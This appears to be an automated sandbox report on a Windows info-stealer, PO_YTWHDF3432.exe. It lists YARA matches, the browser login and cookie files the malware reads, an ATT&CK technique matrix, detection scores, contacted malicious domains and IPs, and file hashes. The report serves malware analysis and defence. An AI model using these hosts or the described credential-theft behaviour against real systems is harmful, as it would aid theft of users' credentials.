            Source: Yara match; File source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\isoburn.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

            Remote Access Functionality

            Source: Yara match; File source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 412 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 21 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
            Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Source | Detection | Scanner | Label | Link
            PO_YTWHDF3432.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            PO_YTWHDF3432.exe | 81% | Virustotal | | Browse
            PO_YTWHDF3432.exe | 100% | Avira | HEUR/AGEN.1305452 |
            PO_YTWHDF3432.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
                                        high
                                        https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cdn.jsinit.directfwd.com/sk-jspark_init.phpisoburn.exe, 0000000B.00000002.3734102221.0000000005AF6000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003336000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1595035240.000000000A126000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mozilla.org0/isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://crash-reports.mozilla.com/submit?id=isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://files.reg.ru/fonts/inter/Inter-Medium.woff2)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                              high
                                              https://2domains.ruisoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.reg.ru/hosting/isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        http://www.wrautomotive.onlineqNENczArVjafOgvC.exe, 0000000D.00000002.3732252302.0000000002CCD000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://files.reg.ru/fonts/inter/Inter-Medium.woff)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://www.reg.ru/hostingqNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              https://files.reg.ru/fonts/inter/Inter-Regular.woff2)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.jsisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://reg.ru?target=_blankisoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        131.153.147.90
                                                                        instantconvey.comUnited States
                                                                        19437SS-ASHUSfalse
                                                                        37.97.254.27
                                                                        wrautomotive.onlineNetherlands
                                                                        20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                                        162.241.252.161
                                                                        thecoloringbitch.comUnited States
                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                        94.23.162.163
                                                                        www.domainappraisalbot.comFrance
                                                                        16276OVHFRfalse
                                                                        162.222.226.77
                                                                        alldaysslimmingstea.comUnited States
                                                                        394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                        85.159.66.93
                                                                        natroredirect.natrocdn.comTurkey
                                                                        34619CIZGITRfalse
                                                                        185.74.252.11
                                                                        altralogos.comLithuania
                                                                        59939WIBO-ASLTfalse
                                                                        81.169.145.70
                                                                        fam-scharf.netGermany
                                                                        6724STRATOSTRATOAGDEfalse
                                                                        37.140.192.89
                                                                        www.makeinai.onlineRussian Federation
                                                                        197695AS-REGRUfalse
                                                                        74.208.236.181
                                                                        www.jones4deepriver.comUnited States
                                                                        8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                        34.149.198.43
                                                                        www.611erhm.topUnited States
                                                                        2686ATGS-MMD-ASUSfalse
                                                                        107.178.250.177
                                                                        www.77moea.topUnited States
                                                                        15169GOOGLEUSfalse
                                                                        66.29.155.54
                                                                        www.nesmalt.infoUnited States
                                                                        19538ADVANTAGECOMUSfalse
                                                                        172.67.184.73
                                                                        www.poria.linkUnited States
                                                                        13335CLOUDFLARENETUSfalse
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1352165
Start date and time: 2023-12-02 18:47:24 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: PO_YTWHDF3432.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 193
• Number of non-executed functions: 275
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.

Time | Type | Description
18:48:15 | API Interceptor | 2x Sleep call for process: PO_YTWHDF3432.exe modified
18:49:01 | API Interceptor | 10344578x Sleep call for process: isoburn.exe modified
                                                                        file.exeGet hashmaliciousBazaLoaderBrowse
                                                                        • 131.153.152.122
                                                                        SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.100.231
                                                                        https://drive.google.com/file/d/11qmYm6lCQxQsYSNvVMa92eUR4AcCAhCn/previewGet hashmaliciousUnknownBrowse
                                                                        • 198.24.171.52
                                                                        Quote#2310303384.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.100.231
                                                                        https://freefireenewgames.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 131.153.148.28
                                                                        https://freenetflixxaccontcom.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 23.235.251.211
                                                                        https://allezlens.fr/Get hashmaliciousUnknownBrowse
                                                                        • 131.153.148.26
                                                                        Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.186
                                                                        Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.186
                                                                        https://komposty.cz/.dps/index/myaccount/Get hashmaliciousUnknownBrowse
                                                                        • 131.153.242.59
                                                                        njvmboDs7W.exeGet hashmaliciousAmadey, Glupteba, RHADAMANTHYS, RedLineBrowse
                                                                        • 131.153.147.42
                                                                        temp.vbsGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.162
                                                                        TRANSIP-ASAmsterdamtheNetherlandsNLPO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                        • 37.97.254.27
                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.142
                                                                        Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                        • 185.211.251.125
                                                                        F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                        • 37.97.214.109
                                                                        INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.168
                                                                        NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        Document.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.197
                                                                        sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                        • 149.210.216.118
                                                                        RF_-_ORDER_8990387_REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                        • 86.105.245.69
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                        Process:C:\Windows\SysWOW64\isoburn.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.1211596417522893
                                                                        Encrypted:false
                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.353704637538297
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:PO_YTWHDF3432.exe
                                                                        File size:956'928 bytes
                                                                        MD5:0bc4df2daa2bea193866307038113708
                                                                        SHA1:7d90b61cfb0f9c54d301bb8ee6af650606efe862
                                                                        SHA256:bf7c1a1fdf3903e051dcc7136e63e73ddc16e07c00d87553db63f4b7eadcb14e
                                                                        SHA512:aeda45e08d5d68e07ef74691a80aa3fe006d63f2e39b594882ff053e8a456d1083de5d6caa6f150e099c9d8756241460a1ee197ee050bc909f2d93758ec13b60
                                                                        SSDEEP:12288:fswTVr8xmHiJ8FfU65O8bVeW6acxe+h68aQ2H3XTbKQ5eHCd:UwpAUCJ8Rvbb6aTWEn/eH
                                                                        TLSH:05157ED1B1508D9AED6B0AF26C2BA53025E37E9D54A4C10C5A9EB75736F3302209FE1F
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q...............0..............(... ...@....@.. ....................................@................................
                                                                        Icon Hash:aea4accc16a3d9be
                                                                        Entrypoint:0x4a282e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x8451EF9E [Mon May 7 00:11:10 2040 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        inc ecx
                                                                        inc ebp
                                                                        aaa
                                                                        aaa
                                                                        pop ecx
                                                                        xor eax, 3537355Ah
                                                                        xor al, 38h
                                                                        inc esi
                                                                        push esi
                                                                        inc edi
                                                                        xor ecx, dword ptr [edx+35h]
                                                                        pop eax
                                                                        inc ebp
                                                                        xor eax, 00000034h
add byte ptr [eax], al (repeated 84 times)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa27dc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x48b20 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xee000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9fefc | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa084c | 0xa0a00 | False | 0.9255122203307393 | data | 7.9060088345737976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa4000 | 0x48b20 | 0x48c00 | False | 0.06338930949312714 | data | 4.769396222171235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xee000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa42e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.1798780487804878
RT_ICON | 0xa4948 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2513440860215054
RT_ICON | 0xa4c30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.3918918918918919
RT_ICON | 0xa4d58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3200959488272921
RT_ICON | 0xa5c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.33664259927797835
RT_ICON | 0xa64a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.2622832369942196
RT_ICON | 0xa6a10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.04393141403083114
RT_ICON | 0xe8a38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.18786307053941909
RT_ICON | 0xeafe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.2453095684803002
RT_ICON | 0xec088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3484042553191489
RT_GROUP_ICON | 0xec4f0 | 0x92 | data | | | 0.5753424657534246
RT_VERSION | 0xec584 | 0x3ae | data | | | 0.4171974522292994
RT_MANIFEST | 0xec934 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Dec 2, 2023 18:49:59.735086918 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735129118 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.735407114 CET804972337.140.192.89192.168.2.10
